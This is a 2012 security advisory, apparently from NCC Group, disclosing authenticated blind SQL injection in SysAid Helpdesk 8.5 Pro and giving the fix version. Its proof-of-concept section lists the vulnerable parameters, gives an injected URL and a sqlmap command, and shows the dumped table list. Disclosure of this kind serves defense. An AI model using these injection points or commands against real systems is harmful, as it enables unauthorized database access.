NGS000241 Technical Advisory: SysAid Helpdesk Pro Blind SQL Injection


======= Summary ======= Name: SysAid Helpdesk Pro - Blind SQL Injection Release Date: 30 November 2012 Reference: NGS00241 Discoverer: Daniel Compton <daniel.compton@ngssecure.com> Vendor: SysAid Vendor Reference: Systems Affected: SysAid Helpdesk 8.5 Pro Risk: High Status: Published ======== TimeLine ======== Discovered: 12 March 2012 Released: 12 March 2012 Approved: 12 March 2012 Reported: 14 March 2012 Fixed: 1 August 2012 Published: 30 November 2012 =========== Description =========== SysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product. I. VULNERABILITY ------------------------- SysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface. II. BACKGROUND ------------------------- SyAid is a fully web based helpdesk solution. http://www.ilient.com/ III. DESCRIPTION ------------------------- SQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk. ================= Technical Details ================= IV. PROOF OF CONCEPT ------------------------- The following URL and parameters have been confirmed to suffer from Blind SQL injection. /AssetManagementList.jsp (GET Parameter: computerID, group1) AssetManagementChart.jsp (GET Parameter: group1) /genericreport (POST Parameter: assetID, customSQL, groupFilter) CIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons) /AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices python sqlmap.py --url="" --dbms=mysql -p computerID --cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5 Database: ilient [10 tables] +-----------------------+ | account | | agreement | | asset2ci | | asset_catalog | | asset_catalog_files | | asset_catalog_history | | asset_catalog_links | | asset_data_day_data | | asset_data_month_data | | asset_data_week_data | +-----------------------+ =============== Fix Information =============== Fixed in version 8.5.08 http://www.sysaid.com/bugs-fixed-8-5.htm#8508 Download Product Patch: http://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe NCC Group Research http://www.nccgroup.com/research For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br> This email message has been delivered safely and archived online by Mimecast. </a>